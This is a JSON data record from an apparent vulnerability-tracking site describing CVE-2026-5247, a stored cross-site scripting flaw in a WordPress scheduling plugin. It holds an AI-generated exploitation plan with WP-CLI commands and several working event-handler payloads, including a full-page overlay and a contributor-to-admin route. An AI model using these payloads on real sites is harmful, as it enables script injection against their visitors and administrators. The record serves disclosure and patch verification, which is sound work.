[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fxBlpn5LTmLguaOgm0fANAe6PLete08kGmQLsT9WEgaU":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":37},"CVE-2026-5247","schedule-post-changes-with-publishpress-future-unpublish-delete-change-status-trash-change-categories-authenticated-admi","Schedule Post Changes With PublishPress Future: Unpublish, Delete, Change Status, Trash, Change Categories \u003C= 4.10.0 - Authenticated (Administrator+) Stored Cross-Site Scripting via 'wrapper' Shortcode Attribute","The Schedule Post Changes With PublishPress Future plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wrapper' attribute of the [futureaction] shortcode in all versions up to, and including, 4.10.0. This is due to insufficient input sanitization on the wrapper attribute. The plugin uses esc_html() to escape the value, but esc_html() only encodes HTML entities and does not prevent attribute injection when the value is used as an HTML tag name in a sprintf() call. An attacker can inject event handler attributes via spaces in the wrapper value. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Since it is also possible for administrators to make this functionality available to lower-privileged users, this introduces the possibility of abuse by contributors.","post-expirator",null,"\u003C=4.10.0","4.10.1","medium",5.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-04 14:02:32","2026-05-05 02:26:56",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F9acf80aa-8354-4430-9836-18fa17854521?source=api-prod",1,[22,23,24,25,26,27,28,29],"composer.json","languages\u002Fpost-expirator-de_DE.l10n.php","languages\u002Fpost-expirator-de_DE.po","languages\u002Fpost-expirator-en_EN.l10n.php","languages\u002Fpost-expirator-en_EN.po","languages\u002Fpost-expirator-es_ES.l10n.php","languages\u002Fpost-expirator-es_ES.po","languages\u002Fpost-expirator-fi.l10n.php","researched",false,3,"This plan outlines the steps to verify a Stored Cross-Site Scripting (XSS) vulnerability in the **PublishPress Future** plugin (v4.10.0 and below). The vulnerability exists in the handling of the `wrapper` attribute within the `[futureaction]` shortcode.\n\n### 1. Vulnerability Summary\nThe `[futureaction]` shortcode allows users to display information about scheduled post changes. The `wrapper` attribute defines the HTML tag used to wrap this information. The plugin uses `esc_html()` on the `wrapper` value, but subsequently uses it as a tag name within a `sprintf()` call (e.g., `\u003C%s>...\u003C\u002F%s>`). \n\nBecause `esc_html()` only encodes entities like `\u003C` and `>`, it does not prevent the injection of spaces and additional attributes. An attacker can break out of the tag name and inject event handlers (like `onmouseover` or `onload`).\n\n### 2. Attack Vector Analysis\n- **Shortcode:** `[futureaction]`\n- **Vulnerable Attribute:** `wrapper`\n- **Payload Location:** The value of the `wrapper` attribute in a post or page.\n- **Authentication Level:** Administrator (default), or Contributor\u002FAuthor if they are permitted to use shortcodes.\n- **Vulnerable Path:** The shortcode rendering logic, typically found in a controller like `src\u002FModules\u002FExpirator\u002FControllers\u002FShortcodeController.php` (inferred from plugin structure).\n\n### 3. Code Flow (Inferred)\n1. **Entry Point:** A user with post-editing capabilities creates a post containing: `[futureaction wrapper=\"div onmouseover=alert(1)\"]`.\n2. **Shortcode Processing:** WordPress identifies the `[futureaction]` shortcode and calls the plugin's registered callback function.\n3. **Attribute Extraction:** The callback retrieves attributes. The `wrapper` attribute is assigned the value `div onmouseover=alert(1)`.\n4. **Insufficient Sanitization:** The code applies `esc_html(\"div onmouseover=alert(1)\")`. Since there are no HTML special characters, the string remains unchanged.\n5. **Vulnerable Sink:** The code constructs HTML using `sprintf` or string concatenation:\n   ```php\n   $output = sprintf('\u003C%1$s>%2$s\u003C\u002F%1$s>', $wrapper, $content);\n   ```\n6. **Resulting HTML:**\n   ```html\n   \u003Cdiv onmouseover=alert(1)>Shortcode Content\u003C\u002Fdiv onmouseover=alert(1)>\n   ```\n7. **Execution:** When any user (including an Administrator) views the post, the injected attribute fires.\n\n### 4. Nonce Acquisition Strategy\nThis vulnerability does not require an AJAX or REST API nonce for the **exploitation** phase (rendering). It only requires the ability to **save** a post containing the shortcode. \n\nIf the goal is to demonstrate exploitation via a lower-privileged user (e.g., Contributor) and you need to bypass standard WordPress post-save nonces, you would follow the standard WordPress UI flow:\n1. Navigate to the post editor (`wp-admin\u002Fpost-new.php`).\n2. Extract the `_wpnonce` from the form.\n3. Submit the post via `http_request`.\n\nHowever, for a PoC, we will assume the attacker has the capability to create\u002Fedit posts (as an Administrator or Contributor) and will use WP-CLI to set up the payload.\n\n### 5. Exploitation Strategy\nWe will create a post containing a malicious shortcode and then verify its rendering.\n\n**Step 1: Identify the target.**\nWe will target a standard post.\n\n**Step 2: Create the payload post.**\nUse a payload that triggers automatically or via a simple interaction. \nPayload: `div onmouseover=alert(document.domain) style=display:block;width:1000px;height:1000px;position:fixed;top:0;left:0;z-index:9999` (This covers the whole page in an invisible div that triggers on any mouse movement).\n\n**Step 3: Execute the HTTP request.**\nNavigate to the post and capture the response HTML.\n\n### 6. Test Data Setup\n1. **Ensure Plugin is Active:**\n   ```bash\n   wp plugin activate post-expirator\n   ```\n2. **Create the Malicious Post:**\n   ```bash\n   wp post create --post_type=post --post_title=\"XSS Test\" --post_status=publish --post_content='[futureaction wrapper=\"div onmouseover=alert(window.origin) style=position:fixed;top:0;left:0;width:100%;height:100%;z-index:9999;\" dummytag=\"test\"]'\n   ```\n   *Note: We include `dummytag=\"test\"` to ensure the content within the shortcode is not empty, forcing the wrapper to render.*\n\n### 7. Expected Results\nWhen viewing the post via `http_request`, the HTML source should contain:\n```html\n\u003Cdiv onmouseover=alert(window.origin) style=position:fixed;top:0;left:0;width:100%;height:100%;z-index:9999; dummytag=\"test\">\n```\nThe browser agent should detect the `alert(window.origin)` execution if the `onmouseover` event is triggered.\n\n### 8. Verification Steps\n1. **HTTP Verification:**\n   Use the `http_request` tool to fetch the permalink of the created post.\n   ```javascript\n   \u002F\u002F In the PoC agent\n   const response = await http_request({\n     url: \"http:\u002F\u002Flocalhost:8080\u002F?p=ID_OF_CREATED_POST\",\n     method: \"GET\"\n   });\n   if (response.body.includes('onmouseover=alert(window.origin)')) {\n     console.log(\"Vulnerability Confirmed: Injected attribute found in HTML.\");\n   }\n   ```\n\n2. **Database Verification:**\n   Verify that the shortcode remains in the database and was not stripped by WordPress's `kses` filters during save (which happens for Contributors but not Admins).\n   ```bash\n   wp post get \u003CID> --field=post_content\n   ```\n\n### 9. Alternative Approaches\n- **Autofocus\u002FOnfocus Payload:** If `onmouseover` is not ideal for the environment:\n  `[futureaction wrapper=\"input autofocus onfocus=alert(1)\"]`\n- **SVG Payload:** If the plugin restricts the wrapper to certain tags (unlikely given the `sprintf` description):\n  `[futureaction wrapper=\"svg onload=alert(1)\"]`\n- **Contributor Role Test:** Verify if a Contributor can perform this. By default, WordPress allows Contributors to use shortcodes but strips `unfiltered_html`. However, since the vulnerability is in how the *plugin* renders the shortcode attributes (and the attributes themselves are just text in the `post_content`), the `kses` filter will not stop this injection.\n  1. Create a Contributor user.\n  2. Log in as Contributor.\n  3. Create a post with the shortcode.\n  4. View as Admin.","gemini-3-flash-preview","2026-05-04 16:54:18","2026-05-04 16:54:47",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","4.10.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpost-expirator\u002Ftags\u002F4.10.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpost-expirator.4.10.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpost-expirator\u002Ftags\u002F4.10.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpost-expirator.4.10.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpost-expirator\u002Ftags"]